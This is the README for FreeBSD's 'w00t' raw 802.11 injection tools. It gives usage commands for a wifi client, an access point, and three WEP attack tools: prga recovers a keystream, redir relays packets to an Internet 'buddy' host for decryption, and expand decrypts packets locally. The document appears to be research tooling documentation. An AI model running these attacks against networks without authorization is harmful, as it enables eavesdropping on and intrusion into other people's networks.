1$FreeBSD: src/tools/tools/net80211/w00t/README,v 1.2 2009/07/24 15:31:22 sam Exp $ 2 3This is a collection of tools that use raw 802.11 packet injection. 4None of the tools configure the interface, so be sure to run something 5like: 6 7ifconfig wlan create wlandev ath0 wlanmode ahdemo channel 7 promisc up 8 9beforehand. The following tools are found here: 10 11assoc A wifi client. 12ap A wifi access point. 13 14prga Gives ability to transmit on a WEP network. 15redir Gives ability to decrypt in real-time on a WEP network, via Internet. 16expand Gives ability to decrypt locally on a WEP network. 17 18All these tools depend on: 19 20libw00t Utility functions used by all tools. 21 22Detailed explanation of tools. 23============================== 24 25assoc: 26 27Acts as a wifi client. It will associate to a network and bind a 28tap interface to it. The interface may be used like a standard eth 29interface attached to a normal LAN. Multiple instances of the 30program may be run in order to connect to multiple APs simultaneously. 31Example: 32 33./assoc -s w00t -t tap0 34ifconfig tap0 192.168.0.123 up 35ping 192.168.0.1 36 37ap: 38 39The same as assoc, but acts as an access point. Example: 40 41./ap -s w00t -t tap1 42ifconfig tap1 192.168.0.1 up 43tcpdump -n -i tap1 44 45[For the next set of tools, refer to http://tapir.cs.ucl.ac.uk/bittau-wep.pdf 46for theoretical information.] 47 48prga: 49 50Sniff a packet on a WEP network and obtain a keystream. It binds 51to a tap interface which may be used to TX packets on that network. 52Example: 53 54./prga -b bssid_of_network -t tap0 55ifconfig tap0 192.168.0.123 up 56ping 192.168.0.1 57 58redir: 59 60Resend WEP packets to our buddy on the Internet. The buddy will 61receive the clear-text and send it back to us via a UDP socket. 62This data is then fed back into a tap interface. This way, data 63may be ultimately be read from the tab iface in clear-text. Example: 64 65[Box on Internet]~# ./buddy 66./redir -d buddy_ip -b bssid -t tap0 -r wifi_rtr_mac -s wifi_src_ip -p 666 67ifconfig tap0 up 68tcpdump -n -i tap0 69 70expand: 71 72Sniff a WEP packet and do the linear keystream expansion trick to 73decrypt it. The clear-text packet is sent to a tap interface. 74Example: 75 76./expand -b bssid -t tap0 77ifconfig tap0 up 78tcpdump -n -i tap0 79